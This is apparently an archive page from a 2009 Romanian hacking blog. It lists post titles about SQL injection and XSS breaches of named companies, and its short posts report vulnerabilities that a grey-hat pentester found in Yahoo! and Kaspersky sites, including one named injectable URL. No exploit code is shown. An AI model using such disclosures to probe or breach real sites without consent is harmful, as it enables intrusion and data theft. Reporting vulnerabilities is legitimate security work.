- Apocalipsa dupa Nemessis
- Cand dorinta de afirmare depaseste granitele bunului simt – PaxNwo un leecher ordinar
- Cum sa iti protejezi adresa e-mail si datele confidentiale din aceasta
- Mi s-a furat id-ul de messenger/adresa e-mail. Ce sa fac?
- Experiment social II – andimoisescu.ro
- Pentru posteritate
- In curand…
- “Hot” de id-uri messenger
- Chiar ca sunteti retardati
- Ce nu se invata la scoala – Vendetta (6)
- Apocalipsa dupa Nemessis in (183 Visits)
- Ce servicii de mail folositi? in (101 Visits)
- This is the end in (94 Visits)
- Hackersblog.org is now blog.rstcenter.com in (67 Visits)
- Raportare vulnerabilitati in (66 Visits)
- La multi ani România, la multi ani românilor in (62 Visits)
- De reţinut in (59 Visits)
- News in (58 Visits)
- Un nou membru in (58 Visits)
- So... lol in (56 Visits)
- Mi s-a furat id-ul de messenger/adresa e-mail. Ce sa fac? in (895 Visits)
- SMS scam (1) in (114 Visits)
- Hi5.com coders read this in (109 Visits)
- Dezinformare sau proasta informare? in (90 Visits)
- Phishing Bancpost in (86 Visits)
- Si tentativele de phishing pot fi amuzante in (85 Visits)
- Phishing Raiffeisen cu atasament html in (82 Visits)
- [Utilitare] Suna gratis de pe internet sau de pe iPhone in (261 Visits)
- Ce nu se invata la scoala - Tipuri si tehnici spam/Hi5 (4) in (216 Visits)
- Cum sa iti protejezi adresa e-mail si datele confidentiale din aceasta in (188 Visits)
- Ce nu se invata la scoala - (D)DOS (5) in (179 Visits)
- Despre CSRF, hi5.com, cum sa trisezi la concursuri s.a.m.d. in (174 Visits)
- Virusi in clipuri video [how to] in (166 Visits)
- Ce nu se invata la scoala - Tipuri si tehnici spam (1) in (142 Visits)
- Ce nu se invata la scoala - Tipuri si tehnici spam/mail (2) in (139 Visits)
- Ca musca in... in (96 Visits)
- Internet vs. privacy (1) in (69 Visits)
- Simpatie.ro, matrimoniale3x.ro, apetisant.ro, deliciu.ro , etc Sql injection in (830 Visits)
- usa.kaspersky.com hacked ... full database acces , sql injection in (604 Visits)
- RedTube.com ... The Free Sex Video Community in (212 Visits)
- Yahoo! epic fail - permanent xss unleashed in (178 Visits)
- In atentia BitDefender.com, SQL Injection in (171 Visits)
- No comment - o2.co.uk (forum) in (159 Visits)
- Telegraph.co.uk hacked, sql injection in (156 Visits)
- eJobs.ro si peste 1.300.000 de conturi cu date personale in (145 Visits)
- Facebook hacked - sql injection in (144 Visits)
- F-Secure.com - SQL Injection + Cross Site Scripting in (140 Visits)
- Hacker Uses XSS and Google Street View Data to Determine Physical Location in (111 Visits)
- Wannabe Hackers [1] - Cum sa hack-uiesti RapidShare-ul in (108 Visits)
- Wannabe Hackers [2] - cum sa faci un virus by sppy_hacker in (77 Visits)
- Digital Photocopiers Loaded With Secrets in (74 Visits)
- [Video] The History Of Hacking in (52 Visits)
- Christopher "moot" Poole: The case for anonymity online in (49 Visits)
- OWASP Phishing demo in (40 Visits)
- Hope 2603 – Kevin Mitnick - Life a Computer Hacker – Revealed in (35 Visits)
- Owasp5005 Part1 - New zero-day browser exploits - ClickJacking in (35 Visits)
- Email Security - Why You Should Encrypt Your Email - Part One in (35 Visits)
- Se poate sparge parola de Yahoo? in (844 Visits)
- phpBB.ro hacked in (334 Visits)
- Forumul Andreei Balan spart in (323 Visits)
- Camera de supraveghere a universitatii Alexandru Ioan Cuza din Iasi in (175 Visits)
- Experiment social in (165 Visits)
- Experiment social II - andimoisescu.ro in (159 Visits)
- Site-ul Inspectoratului General al Politiei Romane (igpr.ro) a fost spart in (128 Visits)
- Cand dorinta de afirmare depaseste granitele bunului simt - PaxNwo un leecher ordinar in (126 Visits)
- Doua cu Netbridge si una cu Hi5 in (122 Visits)
- "Hot" de id-uri messenger in (116 Visits)
Archive for the ‘English News’ Category
Posted on December 3rd, 2009
After the big scandal regarding usa.kaspersky.com data breach posted for the first time here on hackersblog by our former member “unu”, TinKode, a rising grey-hat pentester, strikes a new domain of this security vendor. Probably we will see a new wave of informations and discussions about this subject via web, and another uber specialist will come and make a crappy security audit that leaves Cross Site Scripting vulnerabilites open.
Here is the original source with delicious details about this intrusion.
Posted on November 24th, 2009
Posted on November 13th, 2009
This vulnerability was patched but I don’t know why the screenshots uploaded by TinKode on imageshack were deleted. Maybe TinKode will provide me those screenshots again.
Anyway, the bug was located at http://careers.yahoo.com/eprofiles.php?id=
Posted on November 13th, 2009
Posted on October 27th, 2009
Posted on October 23rd, 2009
TinKode reported to us another sql injection vulnerability in one of Yahoo! subdomains. From what I saw looking at the screenshots provided by him it’s another blind sql injection but, since we don’t test anymore high risk bugs in another systems without the owners consent, I couldn’t say for sure how much damage can do a possible attacker if this vulnerability is exploited.
This is not the first and probably not the last sql injection vulnerability discovered by a romanian pentester in Yahoo! subdomains. Looking back at our articles we can see that Yahoo! is dealing with a big list of vulns, too many for a huge company with billions of members. We are not here to judge them, but this is a fact: Yahoo! needs a full security audit to prevent those things happen so often.
First time it was a big “wooow” for us to find a sql injection vuln in their domains, but now this is too damn usual. It’s like we are talking about Yahoo! xss’s, everybody can have or discover a piece of that, even a 12 year old kid, with an experience of 6 months in “hacking” bussiness. And this is sad. I can handle with xss attacks, I can protect my ass against them, but it’s impossible to mitigate a sql injection from my user side. This is what worries me right now. But enough with this emo speech.
Yahoo! staff was notified and we are waiting to see the vulnerability fixed before the screenshots will be made public on HackersBlog.
Posted on October 22nd, 2009
Those two(?) vulnerabilities are NOT confirmed. Read more about usa.kaspersky.com vulnerabilities here.
Source: http://rstcenter.com/forum/17628-kaspersky.rst
Credit: NeOh
Posted on October 14th, 2009
Posted on October 11th, 2009
Screenshots:
- http://i44.tinypic.com/vnjl10.png
- http://i41.tinypic.com/25j9zle.png
- http://i37.tinypic.com/294t26t.png
- http://i35.tinypic.com/qnpf9y.png
- http://i38.tinypic.com/23r5mw.png
- http://i37.tinypic.com/2rfe92u.png
- http://i35.tinypic.com/a57s5e.png
Author: TinKode a.k.a. cOde.breaker
Video/screenshots source: http://rstcenter.com/forum/17443-nasa-gov-proof.rst